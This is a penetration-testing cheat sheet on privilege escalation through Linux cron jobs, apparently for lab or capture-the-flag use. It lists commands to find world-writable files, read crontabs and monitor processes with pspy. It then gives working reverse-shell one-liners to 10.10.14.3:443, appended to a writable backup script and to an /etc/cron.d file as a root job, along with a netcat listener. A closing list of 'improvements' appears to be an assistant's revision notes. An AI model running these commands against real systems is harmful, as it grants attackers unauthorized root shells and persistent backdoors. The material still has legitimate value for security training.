cron-job-abuse

Find World-Writable Files (Potential Cron Job Scripts)

World-writable files could be abused for privilege escalation if executed by a higher-privileged user.

find / -path /proc -prune -o -type f -perm -o+w -exec ls -lah {} + 2>/dev/null

• -path /proc -prune → Excludes /proc to avoid unnecessary noise.

• -type f -perm -o+w → Finds world-writable files.

• -exec ls -lah {} + → Displays detailed information.

List Files in a Suspicious Directory

If a backup or script directory is writable, it could be used for privilege escalation.

ls -lah /dmz-backups/

• Check for writable files (w permission) and ownership.

Check Cron Jobs (If You Have Permissions)

List user and system-wide cron jobs:

crontab -l                # Current user's cron jobs  
sudo crontab -l           # Root user's cron jobs (if accessible)  
cat /etc/crontab          # System-wide cron jobs  

Check /etc/cron.d/ for Scheduled Jobs

Cron jobs in /etc/cron.d/ might be running scripts as privileged users.

ls -lah /etc/cron.d/
cat /etc/cron.d/* 2>/dev/null  # View contents if readable  

Use pspy to Monitor Background Processes

pspy is a powerful tool for identifying scripts executed by cron jobs.

Download pspy (Choose the Right Architecture)

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

Make it Executable

chmod +x pspy64

Run pspy to Monitor Processes

./pspy64 -pf -i 1000

Modify a Vulnerable Script (Example: /dmz-backups/backup.sh)

Backup the Original Script

cp /dmz-backups/backup.sh /dmz-backups/backup.sh.bak

Append a Reverse Shell Payload

echo "bash -i >& /dev/tcp/10.10.14.3/443 0>&1" >> /dmz-backups/backup.sh

Start a Netcat Listener (On Your Attacking Machine)

nc -lnvp 443

Restore the Original Script After Testing

cp /dmz-backups/backup.sh.bak /dmz-backups/backup.sh

Modify a Writable Cron Job File (Example: /etc/cron.d/vulnerable_cron)

Backup the File

cp /etc/cron.d/vulnerable_cron /etc/cron.d/vulnerable_cron.bak

Append a Malicious Cron Job

echo "* * * * * root bash -c 'bash -i >& /dev/tcp/10.10.14.3/443 0>&1'" >> /etc/cron.d/vulnerable_cron

Restore the Original Cron File

cp /etc/cron.d/vulnerable_cron.bak /etc/cron.d/vulnerable_cron

Key Improvements and Explanations:

• find command: The find command now includes -path /proc -prune to avoid traversing the /proc filesystem, which can cause performance issues.

• crontab commands: Added both user and root crontab -l commands.

• cron.d directory: Included a command to list the contents of /etc/cron.d/.

• pspy download: Added a wget command to download pspy. You'll need to adjust the URL if a newer version is available or for a different architecture.

• Script backup: Emphasized the importance of backing up the original script before modifying it.

• Reverse shell: Provided an example of a Bash one-liner reverse shell.

• Netcat listener: Included the nc command to start a listener.

• Cron.d file modification: Added an example of how to modify a vulnerable file in /etc/cron.d/, including backup and restore commands.

• Safety: The commands are now formatted to highlight their potential danger.

• Clarity: Improved explanations of each command's purpose.